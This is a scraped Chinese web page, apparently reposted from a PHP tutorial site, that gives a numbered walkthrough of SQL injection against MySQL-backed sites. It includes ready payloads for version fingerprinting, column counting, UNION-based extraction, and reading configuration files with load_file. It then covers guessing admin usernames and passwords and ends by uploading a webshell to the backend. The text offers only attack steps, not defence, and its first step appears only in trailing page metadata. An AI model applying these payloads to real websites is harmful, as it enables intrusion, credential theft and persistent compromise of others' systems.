php判断注入的10个方法介绍_PHP教程
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了php判断注入的10个方法介绍_PHP教程,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1246字,纯文字阅读大概需要2分钟。
内容图文
![php判断注入的10个方法介绍_PHP教程](/upload/InfoBanner/zyjiaocheng/176/9fbfb6fa02574675b3f831cc00bfd146.jpg)
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union 查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union 来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6. 如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file (char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file
(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,说明存在这个表。
8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。
9.同理再猜解password字段,猜解成功再找后台登录。
10.登录后台,上传shell
http://www.bkjia.com/PHPjc/486055.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/486055.htmlTechArticle1.判断是否存在注入,加;and 1=1;and 1=2 2.判断版本 and ord(mid(version(),1,1))51 /* 返回正常说明是4.0以上版本,可以用union 查询 3.利用order by 暴字段,...
内容总结
以上是互联网集市为您收集整理的php判断注入的10个方法介绍_PHP教程全部内容,希望文章能够帮你解决php判断注入的10个方法介绍_PHP教程所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。